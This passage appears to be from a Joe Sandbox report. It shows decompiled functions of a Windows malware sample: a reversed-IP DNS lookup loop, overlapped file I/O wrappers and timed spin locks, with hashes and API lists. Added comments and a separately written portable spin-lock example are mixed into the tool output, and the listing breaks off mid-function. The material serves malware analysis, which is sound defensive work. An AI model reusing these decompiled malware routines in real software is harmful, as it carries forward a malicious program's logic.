				_t49 = _t49 + 1;
			} while (_t91 != 0);
			 *((char*)(_t105 + _t49 - _t102 - 0x24)) = _t91;
			_t51 = _t98;
			_t35 = _t51 + 1; // 0x2
			_t103 = _t35;
			do {
				_t92 =  *_t51;
				_t51 = _t51 + 1;
			} while (_t92 != 0);
			E0040EE5C(_t105 - 0x24, _t98, _t51 - _t103);
			wsprintfA(_t105 - 0xa4, "%u.%u.%u.%u.%s",  *(_t105 + 0x7b) & 0x000000ff,  *(_t105 + 0x7a) & 0x000000ff,  *(_t105 + 0x79) & 0x000000ff,  *(_t105 + 0x78) & 0x000000ff, _t105 - 0x24);
			if(E00402684(_t105 - 0xa4) != 0) {
				 *(_t105 + 0x6c) =  *(_t105 + 0x6c) | 1 <<  *(_t105 + 0x7c);
			}
			L12:
			return  *(_t105 + 0x6c);
		}
		 *(_t105 + 0x5c) =  *(_t105 + 0x78) & 0x000000ff;
		 *(_t105 + 0x60) =  *(_t105 + 0x79) & 0x000000ff;
		 *(_t105 + 0x68) =  *(_t105 + 0x7a) & 0x000000ff;
		 *(_t105 + 0x64) =  *(_t105 + 0x7b) & 0x000000ff;
		while(1) {
			 *((char*)(_t105 + _t101 - _t98 - 0x24)) = 0;
			E0040EE5C(_t105 - 0x24, _t98, _t101 - _t98);
			_t22 = _t101 + 1; // 0x1
			_t98 = _t22;
			wsprintfA(_t105 - 0xa4, "%u.%u.%u.%u.%s",  *(_t105 + 0x64),  *(_t105 + 0x68),  *(_t105 + 0x60),  *(_t105 + 0x5c), _t105 - 0x24);
			_t80 = E00402684(_t105 - 0xa4);
			_t108 = _t108 + 0x2c;
			if(_t80 != 0) {
				 *(_t105 + 0x6c) =  *(_t105 + 0x6c) | 1 <<  *(_t105 + 0x7c);
			}
			 *(_t105 + 0x7c) =  *(_t105 + 0x7c) + 1;
			if( *(_t105 + 0x7c) > 0x1e) {
				goto L12;
			}
			_t101 = E0040ED03(_t98, 0x2c);
			if(_t101 != 0) {
                                                                                                                                  						continue;
                                                                                                                                  					}
                                                                                                                                  					goto L6;
                                                                                                                                  				}
                                                                                                                                  				goto L12;
                                                                                                                                  			}

                                                                                                                                  Instruction addresses: 0x00401c60, 0x00401c64, 0x00401c6a, 0x00401c71, 0x00401c74, 0x00401c86, 0x00401c8c, 0x00401d1c, 0x00401d1c, 0x00401d1e, 0x00401d1e, 0x00401d21, 0x00401d21, 0x00401d23, 0x00401d24, 0x00401d2a, 0x00401d2e, 0x00401d30, 0x00401d30, 0x00401d33, 0x00401d33, 0x00401d35, 0x00401d36, 0x00401d42, 0x00401d6b, 0x00401d7e, 0x00401d88, 0x00401d88, 0x00401d8b, 0x00401d95, 0x00401d95, 0x00401c96, 0x00401c9d, 0x00401ca4, 0x00401cab, 0x00401cae, 0x00401cb3, 0x00401cbd, 0x00401cd2, 0x00401cd2, 0x00401ce1, 0x00401cea, 0x00401cef, 0x00401cf4, 0x00401cfe, 0x00401cfe, 0x00401d04, 0x00401d0a, 0x00000000, 0x00000000, 0x00401d14, 0x00401d1a, 0x00000000, 0x00000000, 0x00000000, 0x00401d1a, 0x00000000

                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: wsprintf
                                                                                                                                  • String ID: %u.%u.%u.%u.%s$localcfg
                                                                                                                                  • API String ID: 2111968516-120809033
                                                                                                                                  • Opcode ID: 013209f5f393509082169113c365cfa774f3339610439ce827356f9210efd2df
                                                                                                                                  • Instruction ID: f60862e96afe744063ef1f8e151e0253a3d6131670b42bf9f562b78b9aabf051
                                                                                                                                  • Opcode Fuzzy Hash: 013209f5f393509082169113c365cfa774f3339610439ce827356f9210efd2df
                                                                                                                                  • Instruction Fuzzy Hash: 3C41C1729042999FDB21DF798D44BEE7BE89F49310F240066FD64E3192D639EA04CBA4
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00403F18(void* _a4, void* _a8, long _a12, long _a16, long _a20) {
                                                                                                                                  				struct _OVERLAPPED _v24;
                                                                                                                                  				long _t30;
                                                                                                                                  				void* _t31;
                                                                                                                                  
                                                                                                                                  				_v24.Offset = _v24.Offset & 0x00000000;
                                                                                                                                  				_v24.OffsetHigh = _v24.OffsetHigh & 0x00000000;
                                                                                                                                  				_t30 = _a12;
                                                                                                                                  				_t31 = _a16;
                                                                                                                                  				_a16 = _a16 & 0x00000000;
                                                                                                                                  				_v24.hEvent = _t31;
                                                                                                                                  				if(WriteFile(_a4, _a8, _t30,  &_a16,  &_v24) != 0) {
                                                                                                                                  					L3:
                                                                                                                                  					if(_t30 != _a16) {
                                                                                                                                  						L5:
                                                                                                                                  						return 0;
                                                                                                                                  					}
                                                                                                                                  					return 1;
                                                                                                                                  				}
                                                                                                                                  				if(GetLastError() != 0x3e5) {
                                                                                                                                  					goto L5;
                                                                                                                                  				}
                                                                                                                                  				WaitForSingleObject(_t31, _a20);
                                                                                                                                  				if(GetOverlappedResult(_a4,  &_v24,  &_a16, 0) == 0) {
                                                                                                                                  					goto L5;
                                                                                                                                  				}
                                                                                                                                  				goto L3;
                                                                                                                                  			}

                                                                                                                                  Instruction addresses: 0x00403f1e, 0x00403f22, 0x00403f27, 0x00403f2b, 0x00403f2e, 0x00403f3e, 0x00403f4c, 0x00403f7c, 0x00403f7f, 0x00403f86, 0x00000000, 0x00403f86, 0x00000000, 0x00403f83, 0x00403f59, 0x00000000, 0x00000000, 0x00403f5f, 0x00403f7a, 0x00000000, 0x00000000, 0x00000000

                                                                                                                                  APIs
                                                                                                                                  • WriteFile.KERNEL32(00000000,00000000,0040A3C7,00000000,00000000,000007D0,00000001), ref: 00403F44
                                                                                                                                  • GetLastError.KERNEL32 ref: 00403F4E
                                                                                                                                  • WaitForSingleObject.KERNEL32(00000004,?), ref: 00403F5F
                                                                                                                                  • GetOverlappedResult.KERNEL32(00000000,00000000,00000000,00000000), ref: 00403F72
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorFileLastObjectOverlappedResultSingleWaitWrite
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3373104450-0
                                                                                                                                  • Opcode ID: 9f1c12f5bce82851f463a843ee7e6df514edb3150162876966f253c0cf19dcdf
                                                                                                                                  • Instruction ID: 81d5a9f64dfd66904774ebc82d2e0e48c629fa8216d99cd76bf4a5dbd4e59073
                                                                                                                                  • Opcode Fuzzy Hash: 9f1c12f5bce82851f463a843ee7e6df514edb3150162876966f253c0cf19dcdf
                                                                                                                                  • Instruction Fuzzy Hash: B9010C7291110AABDF01DF90ED44BEF7B7CEB08356F104066FA01E2190D774DA558BB6
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00403F8C(void* _a4, void* _a8, long _a12, long _a16, long _a20) {
                                                                                                                                  				struct _OVERLAPPED _v24;
                                                                                                                                  				long _t30;
                                                                                                                                  				void* _t31;
                                                                                                                                  
                                                                                                                                  				_v24.Offset = _v24.Offset & 0x00000000;
                                                                                                                                  				_v24.OffsetHigh = _v24.OffsetHigh & 0x00000000;
                                                                                                                                  				_t30 = _a12;
                                                                                                                                  				_t31 = _a16;
                                                                                                                                  				_a16 = _a16 & 0x00000000;
                                                                                                                                  				_v24.hEvent = _t31;
                                                                                                                                  				if(ReadFile(_a4, _a8, _t30,  &_a16,  &_v24) != 0) {
                                                                                                                                  					L3:
                                                                                                                                  					if(_t30 != _a16) {
                                                                                                                                  						L5:
                                                                                                                                  						return 0;
                                                                                                                                  					}
                                                                                                                                  					return 1;
                                                                                                                                  				}
                                                                                                                                  				if(GetLastError() != 0x3e5) {
                                                                                                                                  					goto L5;
                                                                                                                                  				}
                                                                                                                                  				WaitForSingleObject(_t31, _a20);
                                                                                                                                  				if(GetOverlappedResult(_a4,  &_v24,  &_a16, 0) == 0) {
                                                                                                                                  					goto L5;
                                                                                                                                  				}
                                                                                                                                  				goto L3;
                                                                                                                                  			}

                                                                                                                                  Instruction addresses: 0x00403f92, 0x00403f96, 0x00403f9b, 0x00403f9f, 0x00403fa2, 0x00403fb2, 0x00403fc0, 0x00403ff0, 0x00403ff3, 0x00403ffa, 0x00000000, 0x00403ffa, 0x00000000, 0x00403ff7, 0x00403fcd, 0x00000000, 0x00000000, 0x00403fd3, 0x00403fee, 0x00000000, 0x00000000, 0x00000000

                                                                                                                                  APIs
                                                                                                                                  • ReadFile.KERNEL32(00000000,00000000,0040A3C7,00000000,00000000,000007D0,00000001), ref: 00403FB8
                                                                                                                                  • GetLastError.KERNEL32 ref: 00403FC2
                                                                                                                                  • WaitForSingleObject.KERNEL32(00000004,?), ref: 00403FD3
                                                                                                                                  • GetOverlappedResult.KERNEL32(00000000,00000000,00000000,00000000), ref: 00403FE6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorFileLastObjectOverlappedReadResultSingleWait
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 888215731-0
                                                                                                                                  • Opcode ID: 7dacf77ebfc6f27f1d23b030b7b6a0e1e1f459510f641919a7ac9d23c17bf39a
                                                                                                                                  • Instruction ID: 44fd539f7a3468c5635e20a1652967c761b46accf60e77792ab8a53432005efc
                                                                                                                                  • Opcode Fuzzy Hash: 7dacf77ebfc6f27f1d23b030b7b6a0e1e1f459510f641919a7ac9d23c17bf39a
                                                                                                                                  • Instruction Fuzzy Hash: A601177291110AAFDF01DF90ED45BEF3B7CEF08356F004062F906E2090D7749A549BA6
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 00AD421F
                                                                                                                                  • GetLastError.KERNEL32 ref: 00AD4229
                                                                                                                                  • WaitForSingleObject.KERNEL32(?,?), ref: 00AD423A
                                                                                                                                  • GetOverlappedResult.KERNEL32(00000000,00000000,00000000,00000000), ref: 00AD424D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorFileLastObjectOverlappedReadResultSingleWait
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 888215731-0
                                                                                                                                  • Opcode ID: 7dacf77ebfc6f27f1d23b030b7b6a0e1e1f459510f641919a7ac9d23c17bf39a
                                                                                                                                  • Instruction ID: 5436d33755d669352b18bcd27d891b3ff85a14e444d6f3826d10e5c95f348c36
                                                                                                                                  • Opcode Fuzzy Hash: 7dacf77ebfc6f27f1d23b030b7b6a0e1e1f459510f641919a7ac9d23c17bf39a
                                                                                                                                  • Instruction Fuzzy Hash: 7901E572511109ABEF01DF90ED85BEE7BACEB18355F108062F912E2150D7709A548BB6
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • WriteFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 00AD41AB
                                                                                                                                  • GetLastError.KERNEL32 ref: 00AD41B5
                                                                                                                                  • WaitForSingleObject.KERNEL32(?,?), ref: 00AD41C6
                                                                                                                                  • GetOverlappedResult.KERNEL32(00000000,00000000,00000000,00000000), ref: 00AD41D9
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorFileLastObjectOverlappedResultSingleWaitWrite
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3373104450-0
                                                                                                                                  • Opcode ID: 9f1c12f5bce82851f463a843ee7e6df514edb3150162876966f253c0cf19dcdf
                                                                                                                                  • Instruction ID: 584461c6b07629d216da997c41c3c716ff05fcc51c2567268f438cd55bbee337
                                                                                                                                  • Opcode Fuzzy Hash: 9f1c12f5bce82851f463a843ee7e6df514edb3150162876966f253c0cf19dcdf
                                                                                                                                  • Instruction Fuzzy Hash: 7901E97A51110AABDF01DF90ED84BEE7B6CEB18355F104162F902E2150D7709A948BB5
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • lstrcmp.KERNEL32(?,80000009), ref: 00ADE066
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrcmp
                                                                                                                                  • String ID: A$ A$ A
                                                                                                                                  • API String ID: 1534048567-1846390581
                                                                                                                                  • Opcode ID: 328de717d7c8de90c20bd47ba6ba1583dee1274120ab1c13f1680d5d51b61bca
                                                                                                                                  • Instruction ID: 1e3aff8b4408d35d1c058493d6c52adc6d954ca18720352100d5e9112be37c1e
                                                                                                                                  • Opcode Fuzzy Hash: 328de717d7c8de90c20bd47ba6ba1583dee1274120ab1c13f1680d5d51b61bca
                                                                                                                                  • Instruction Fuzzy Hash: 89F09631200702DBCB30EF25D884A82B7F9FF05321B44862BE15AC7660D3B4E8D8CB91
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			// Spin-lock acquire with timeout: the lock word lives at offset 0x5c of the
                                                                                                                                  			// structure passed in _a4. Returns 0 when the lock was taken, otherwise the
                                                                                                                                  			// elapsed tick count once the 5000 ms (0x1388) timeout has expired.
                                                                                                                                  			E0040A4C7(intOrPtr _a4) {
                                                                                                                                  				long _t3;
                                                                                                                                  				LONG* _t8;
                                                                                                                                  				long _t9;
                                                                                                                                  
                                                                                                                                  				_t9 = GetTickCount();            // start of the wait
                                                                                                                                  				_t8 = _a4 + 0x5c;                // address of the lock word
                                                                                                                                  				while(1) {
                                                                                                                                  					_t3 = InterlockedExchange(_t8, 1);   // atomically set to 1, get previous value
                                                                                                                                  					if(_t3 == 0) {
                                                                                                                                  						break;                           // previous value 0: lock acquired
                                                                                                                                  					}
                                                                                                                                  					_t3 = GetTickCount() - _t9;      // elapsed milliseconds
                                                                                                                                  					if(_t3 < 0x1388) {
                                                                                                                                  						Sleep(0);                        // yield and retry while under 5 s
                                                                                                                                  						continue;
                                                                                                                                  					}
                                                                                                                                  					break;                               // timeout: give up without the lock
                                                                                                                                  				}
                                                                                                                                  				return _t3;
                                                                                                                                  			}

                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 0040A4D1
                                                                                                                                  • GetTickCount.KERNEL32 ref: 0040A4E4
                                                                                                                                  • Sleep.KERNEL32(00000000,?,0040C2E9,0040C4E0,00000000,localcfg,?,0040C4E0,00413588,00408810), ref: 0040A4F1
                                                                                                                                  • InterlockedExchange.KERNEL32(?,00000001), ref: 0040A4FA
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountTick$ExchangeInterlockedSleep
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2207858713-0
                                                                                                                                  • Opcode ID: 4cd0520482080c365333fb8aab0c55e365768e1349ae612301bcb729eb943e51
                                                                                                                                  • Instruction ID: a5473328a7e7118e9aede6741b06156156ec1e7733dd8d1ec56465b12724d56e
                                                                                                                                  • Opcode Fuzzy Hash: 4cd0520482080c365333fb8aab0c55e365768e1349ae612301bcb729eb943e51
                                                                                                                                  • Instruction Fuzzy Hash: 7DE0863720131567C6005BA5BD84FAA7B98AB4D761F164072FB08E3280D6AAA99145BF
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			// Same spin-lock pattern as E0040A4C7, on the lock word at offset 4 of the
                                                                                                                                  			// object in ECX, with a 10 ms sleep per retry and a 10000 ms (0x2710) timeout.
                                                                                                                                  			// Returns 0 when the lock was taken, otherwise the elapsed tick count.
                                                                                                                                  			E00404E92(void* __ecx) {
                                                                                                                                  				long _t2;
                                                                                                                                  				void* _t7;
                                                                                                                                  				LONG* _t8;
                                                                                                                                  				long _t9;
                                                                                                                                  
                                                                                                                                  				_t7 = __ecx;
                                                                                                                                  				_t9 = GetTickCount();            // start of the wait
                                                                                                                                  				_t8 = _t7 + 4;                   // address of the lock word
                                                                                                                                  				while(1) {
                                                                                                                                  					_t2 = InterlockedExchange(_t8, 1);   // atomically set to 1, get previous value
                                                                                                                                  					if(_t2 == 0) {
                                                                                                                                  						break;                           // previous value 0: lock acquired
                                                                                                                                  					}
                                                                                                                                  					_t2 = GetTickCount() - _t9;      // elapsed milliseconds
                                                                                                                                  					if(_t2 < 0x2710) {
                                                                                                                                  						Sleep(0xa);                      // back off 10 ms and retry while under 10 s
                                                                                                                                  						continue;
                                                                                                                                  					}
                                                                                                                                  					break;                               // timeout: give up without the lock
                                                                                                                                  				}
                                                                                                                                  				return _t2;
                                                                                                                                  			}

                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00404E9E
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00404EAD
                                                                                                                                  • Sleep.KERNEL32(0000000A,?,00000001), ref: 00404EBA
                                                                                                                                  • InterlockedExchange.KERNEL32(?,00000001), ref: 00404EC3
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CountTick$ExchangeInterlockedSleep
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2207858713-0
                                                                                                                                  • Opcode ID: 574f7709b1251d8d4516fda0e718bcbaf1509578ef326d685951742d25275ed5
                                                                                                                                  • Instruction ID: 0be737a4b1ecb403dd0b6a084e6b0260aeafc6613011e157a8d43e60cd200510
                                                                                                                                  • Opcode Fuzzy Hash: 574f7709b1251d8d4516fda0e718bcbaf1509578ef326d685951742d25275ed5
                                                                                                                                  • Instruction Fuzzy Hash: 6AE086B620121457D61027B9FD84F966A89AB9A361F010532F70DE21C0C6AA989345FD
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

C-Code - Quality: 100%
/* Spin-lock acquire with a 5-second timeout. __ecx points at an object whose
 * lock word is the LONG at offset 0xc. Returns 0 when the lock was taken, or
 * the elapsed tick count (>= 0x1388) when it gave up; a caller can tell the
 * two outcomes apart because a successful exchange always yields 0. */
E00404BD1(void* __ecx) {
    long _t2;
    void* _t7;
    LONG* _t8;
    long _t9;

    _t7 = __ecx;
    _t9 = GetTickCount();                    /* start time in ms */
    _t8 = _t7 + 0xc;                         /* address of the lock word */
    while(1) {
        _t2 = InterlockedExchange(_t8, 1);   /* atomically store 1, get the old value */
        if(_t2 == 0) {
            break;                           /* word was 0 (free): lock acquired */
        }
        _t2 = GetTickCount() - _t9;          /* elapsed ms since the first attempt */
        if(_t2 < 0x1388) {                   /* 0x1388 = 5000 ms */
            Sleep(0);                        /* give up the rest of the time slice, then retry */
            continue;
        }
        break;                               /* timed out: lock still held elsewhere, return elapsed ms */
    }
    return _t2;
}

Instruction addresses for the listing above: 0x00404bdb 0x00404be5 0x00404be7 0x00404bff 0x00404c02 0x00404c06 0x00000000 0x00000000 0x00404bee 0x00404bf5 0x00404bf9 0x00000000 0x00404bf9 0x00000000 0x00404bf5 0x00404c0c

APIs
• GetTickCount.KERNEL32 ref: 00404BDD
• GetTickCount.KERNEL32 ref: 00404BEC
• Sleep.KERNEL32(00000000,?,?,?,00000004,004050F2), ref: 00404BF9
• InterlockedExchange.KERNEL32(-00000008,00000001), ref: 00404C02
Memory Dump Source
• Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
Yara matches
Similarity
• API ID: CountTick$ExchangeInterlockedSleep
• String ID:
• API String ID: 2207858713-0
• Opcode ID: 1ad869c4a91a2c80201434bef060b196597965ff38d45849583c02ff4b747b44
• Instruction ID: c27c4130c4fb343c81443d6f5f76baf76a02980c1ff66e5fdc0d00212ab38f61
• Opcode Fuzzy Hash: 1ad869c4a91a2c80201434bef060b196597965ff38d45849583c02ff4b747b44
• Instruction Fuzzy Hash: FCE0867624521457D61027A66D80FA67BA89B99361F064073F70CE2190C9AAE48141BD
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 100%
/* Same spin-lock acquire as E00404BD1, but the lock word is passed directly
 * as the argument instead of being located at offset 0xc of an object.
 * Returns 0 on acquisition, otherwise the elapsed ms (>= 0x1388) on timeout. */
E004030FA(LONG* _a4) {
    long _t3;
    long _t5;

    _t5 = GetTickCount();                    /* start time in ms */
    while(1) {
        _t3 = InterlockedExchange(_a4, 1);   /* atomically store 1, get the old value */
        if(_t3 == 0) {
            break;                           /* word was 0 (free): lock acquired */
        }
        _t3 = GetTickCount() - _t5;          /* elapsed ms since the first attempt */
        if(_t3 < 0x1388) {                   /* 0x1388 = 5000 ms */
            Sleep(0);                        /* yield, then retry */
            continue;
        }
        break;                               /* timed out: return elapsed ms */
    }
    return _t3;
}

Instruction addresses for the listing above: 0x0040310b 0x00403122 0x00403128 0x0040312c 0x00000000 0x00000000 0x00403111 0x00403118 0x0040311c 0x00000000 0x0040311c 0x00000000 0x00403118 0x00403131

APIs
• GetTickCount.KERNEL32 ref: 00403103
• GetTickCount.KERNEL32 ref: 0040310F
• Sleep.KERNEL32(00000000), ref: 0040311C
• InterlockedExchange.KERNEL32(?,00000001), ref: 00403128
Memory Dump Source
• Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
Yara matches
Similarity
• API ID: CountTick$ExchangeInterlockedSleep
• String ID:
• API String ID: 2207858713-0
• Opcode ID: 5475aadbbb6481cfb66701b566d3724b8cf1f0baef2ba10e865a3ab4c750e63b
• Instruction ID: 9edc608f4d32da9f9de986fa19dd3c9deb40157c310ade5cfb00ff6fe32d5b40
• Opcode Fuzzy Hash: 5475aadbbb6481cfb66701b566d3724b8cf1f0baef2ba10e865a3ab4c750e63b
• Instruction Fuzzy Hash: 51E0C235200215ABDB00AF75BD44B8A6E9EDF8C762F014432F205EA1E0C9F44D51897A
Uniqueness
Uniqueness Score: -1.00%
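
The two listings above (E00404BD1 and E004030FA) implement the same idiom: a spin lock acquired with InterlockedExchange, polled with Sleep(0) and abandoned after 0x1388 = 5000 ms of GetTickCount time. The block below is an added, portable re-implementation written for this page so the semantics can be exercised; it is not code from the sample or from Joe Sandbox. C11 atomics stand in for InterlockedExchange, the C11 timespec_get clock for GetTickCount and sched_yield() for Sleep(0); the timeout is a parameter so the timed-out path can be shown without waiting five seconds. Every name in it is the example's own.

```c
/* Added example: portable model of the sample's timed spin-lock acquire.
 * Not the sample's code. atomic_exchange replaces InterlockedExchange,
 * timespec_get replaces GetTickCount, sched_yield replaces Sleep(0). */
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L
#endif
#include <sched.h>
#include <stdatomic.h>
#include <stdint.h>
#include <stdio.h>
#include <time.h>

#define TOFSEE_LOCK_TIMEOUT_MS 0x1388u   /* the sample's constant: 5000 ms */

typedef atomic_uint tf_lock_t;           /* 0 = free, 1 = held, as in the sample's LONG */

/* Millisecond counter. Like GetTickCount it is only meaningful as a
 * difference; a production lock would prefer a monotonic clock. */
static uint32_t tick_ms(void)
{
    struct timespec ts;
    timespec_get(&ts, TIME_UTC);
    return (uint32_t)((uint64_t)ts.tv_sec * 1000u + (uint64_t)ts.tv_nsec / 1000000u);
}

/* Mirrors the decompiled loop: store 1 into the lock word and look at what
 * was there. 0 means it was free and is now ours. Otherwise yield and retry
 * until timeout_ms has elapsed. Returns 0 on acquisition or the elapsed
 * milliseconds (>= timeout_ms) on timeout, the two outcomes the sample's
 * callers can distinguish. A zero timeout would make them indistinguishable,
 * which the sample avoids by hard-coding 5000 ms. */
uint32_t spin_lock_timed(tf_lock_t *lock, uint32_t timeout_ms)
{
    uint32_t start = tick_ms();
    for (;;) {
        uint32_t prev = atomic_exchange(lock, 1u);
        if (prev == 0)
            return 0;
        /* Unsigned subtraction stays correct across a 32-bit tick wrap. */
        uint32_t elapsed = tick_ms() - start;
        if (elapsed < timeout_ms) {
            sched_yield();               /* Sleep(0): surrender the time slice */
            continue;
        }
        return elapsed;
    }
}

void spin_unlock(tf_lock_t *lock)
{
    atomic_store(lock, 0u);
}

/* Demonstration: the first acquire succeeds and leaves the word at 1; a
 * second acquire on the held lock spins for the timeout and reports the
 * elapsed time; after unlock the word is 0 and acquisition succeeds again.
 * Returns 1 when all observations match the sample's semantics. */
int demo(uint32_t timeout_ms)
{
    tf_lock_t lock = 0;
    uint32_t r1 = spin_lock_timed(&lock, timeout_ms);   /* free -> 0 */
    unsigned held = atomic_load(&lock);                 /* word now 1 */
    uint32_t r2 = spin_lock_timed(&lock, timeout_ms);   /* held -> elapsed >= timeout */
    spin_unlock(&lock);
    uint32_t r3 = spin_lock_timed(&lock, timeout_ms);   /* free again -> 0 */
    printf("acquire=%u word=%u timed_out_after=%u ms reacquire=%u\n", r1, held, r2, r3);
    return r1 == 0 && held == 1u && r2 >= timeout_ms && r3 == 0;
}

int main(void)
{
    return demo(50u) ? 0 : 1;
}
```

Two points for anyone reading the decompiled callers: the function returns 0 only when the exchange found the word free, and a nonzero return is an elapsed millisecond count rather than a Boolean. GetTickCount returns a DWORD, and with an unsigned comparison the subtraction remains correct across the 49.7-day wrap; the decompiler shows the temporaries as `long`, so the listing alone does not settle the signedness of the compare at 0x1388.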

                                                                                                                                  C-Code - Quality: 93%
                                                                                                                                  			E0040E177(signed int _a4, long _a8) {
                                                                                                                                  				void* _v8;
                                                                                                                                  				void* _v12;
                                                                                                                                  				void* __ecx;
                                                                                                                                  				void* _t31;
                                                                                                                                  				void* _t34;
                                                                                                                                  				intOrPtr* _t36;
                                                                                                                                  				void* _t38;
                                                                                                                                  				intOrPtr* _t41;
                                                                                                                                  				void* _t43;
                                                                                                                                  				void* _t46;
                                                                                                                                  				void* _t47;
                                                                                                                                  				void* _t57;
                                                                                                                                  				void* _t58;
                                                                                                                                  				void* _t67;
                                                                                                                                  				void* _t68;
                                                                                                                                  				void* _t72;
                                                                                                                                  				void* _t77;
                                                                                                                                  
                                                                                                                                  				_push(_t58);
                                                                                                                                  				_push(_t58);
                                                                                                                                  				if(_a8 != 0) {
                                                                                                                                  					L2:
                                                                                                                                  					if( *0x4136c0 == 0) {
                                                                                                                                  						L20:
                                                                                                                                  						_t31 = 1;
                                                                                                                                  						L21:
                                                                                                                                  						return _t31;
